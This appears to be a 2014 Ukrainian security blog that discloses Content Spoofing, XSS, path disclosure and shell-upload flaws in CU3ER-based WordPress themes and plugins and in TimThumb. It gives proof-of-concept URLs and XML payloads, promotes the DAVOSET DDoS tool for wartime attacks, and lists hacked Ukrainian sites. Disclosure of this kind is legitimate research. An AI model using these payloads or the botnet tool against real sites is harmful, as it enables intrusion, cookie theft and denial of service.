Websecurity - Веб безпека

У квітні, 23.04.2014, я виявив Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Flexolio для WordPress. Вона містить CU3ER і TimThumb.

Content Spoofing (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

1.xml:

cu3er-1.xml

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

А також Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок. Вони можливі в старих версіях теми, бо в останніх версіях теми в TimThumb заборонений доступ до зовнішніх сайтів.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD в php-файлах шаблону (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/flexolio/

Уразливі всі версії теми Flexolio.

Сьогодні вийшла нова версія програми DAVOSET v.1.2. Це Nuclear Edition. В цей день бажаю вам виключно мирного атому.

Враховуючи війну Путіна проти України, армія ботів може стати в нагоді. В новій версії:

• Додав підтримку Socks проксі.
• Додав нові сервіси в повний список зомбі.
• Прибрав неробочий сервіс з повного списку зомбі.

Всього в списку міститься 200 зомбі-сервісів, які готові нанести удар проти диктатури.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.2.rar.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dazo.gov.ua (хакером Gabby) - 10.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vrada.gov.ua (хакером Gabby) - 07.04.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://riddle.org.ua (хакером Hmei7) - 02.03.2014, зараз сайт вже виправлений адмінами
• http://buller.net.ua (хакерами з 1923Turk Grup)
• http://www.skypark.com.ua (хакером mustireiS) - 07.03.2014, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах OptimizePress, FormCraft та PhotoSmash Galleries. Для котрих з’явилися експлоіти. OptimizePress - це тема движка, FormCraft - це плагін для створення форм, PhotoSmash Galleries - це плагін для створення галерей зображень.

• WordPress OptimizePress Theme File Upload (деталі)
• WordPress FormCraft Premium SQL Injection (деталі)
• WordPress Photosmash Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про уразливості в CU3ER. У квітні, 19.04.2014, я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних темах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Окрім плагінів, про які я писав, флешка CU3ER також міститься в наступних шаблонах для WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio та інших темах, в тому числі платних і кастом темах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах шаблонів (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/shapeshifter/
http://site/wp-content/themes/shapeshifter2/
http://site/wp-content/themes/los_angeles/
http://site/wp-content/themes/themebox/
http://site/wp-content/themes/themebox10/
http://site/wp-content/themes/themebox11/
http://site/wp-content/themes/elite_force/
http://site/wp-content/themes/webfolio/

Уразливі всі шаблони з флешкою CU3ER: ShapeShifter 1.x і 2.x, Los Angeles, Themebox 1.1, Elite Force 2.1.0, Webfolio 2.0.2 та попередні версії цих тем.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://zmr.gov.ua - інфікований державний сай - інфекція була виявлена 03.02.2014. Зараз сайт не входить до переліку підозрілих.
• http://infocom.lviv.ua - інфекція була виявлена 21.04.2014. Зараз сайт не входить до переліку підозрілих.
• http://tazoxox.pp.ua - інфекція була виявлена 19.04.2014. Зараз сайт не входить до переліку підозрілих.
• http://join.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://eizvestia.com - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.

Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах плагінів (по замовчуванню) або в error_log.

http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php

Уразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.

У квітні, 08.04.2014, вийшла нова версія WordPress 3.8.2. Разом з нею вийшла версія 3.7.2 з виправлення тих самих уразливостей.

WordPress 3.8.2 це багфікс та секюріті випуск нової 3.8 серії. В якому розробники виправили 9 багів та 5 уразливостей.

Серед виправлених уразливостей дві дірки та три “посилення безпеки”. Це підробка кукісів (authentication cookie forgery) та privilege escalation уразливість, що дозволяла користувачам з правами Contributor публікувати пости.

Серер посилень безпеки наступні: покращення pingbacks (виправлена уразливість, що дозволяла проводити DoS атаки через пінгбеки), виправлена SQL Injection в адмінці та виправлена XSS в бібліотеці Plupload, що постачається з WP.

26.11.2013

Раніше я писав про уразливості в CU3ER. У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в веб додатку CU3ER та численних плагінах. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2014

Флешка CU3ER міститься в wpCU3ER для WordPress, jCU3ER і Vinaora Cu3er 3D Slide-show для Joomla, cu3er-silverstripe-extension для SilverStripe, collective.cu3er для Plone та багатьох інших плагінах. І всі вони мають Content Spoofing та XSS уразливості.

Адреси флешки в різних плагінах:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
В старих версіях плагіна:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

Перші два плагіни використовують останню версію CU3ER, а три інші плагини використовують версію 0.9.2 (а також в старих версіях wp-cu3er).

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі всі плагіни з флешкою CU3ER: wpCU3ER 0.75, jCU3ER 0.12, Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1, cu3er-silverstripe-extension, collective.cu3er 0.1 та попередні версії цих плагінів.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.scourt.gov.ua (хакером fr0g) - 04.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://svitanok.gov.ua (хакером d3b~X) - 11.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vesti.ua (хакерами з PATRIOTS) - 16.04.2014, зараз сайт вже виправлений адмінами
• http://viknari.com.ua (хакером redspy)
• http://troyanda.kr.ua (хакерами з Iran Security Team) - 15.04.2014, зараз сайт не працює (відключений провайдером через його взлом)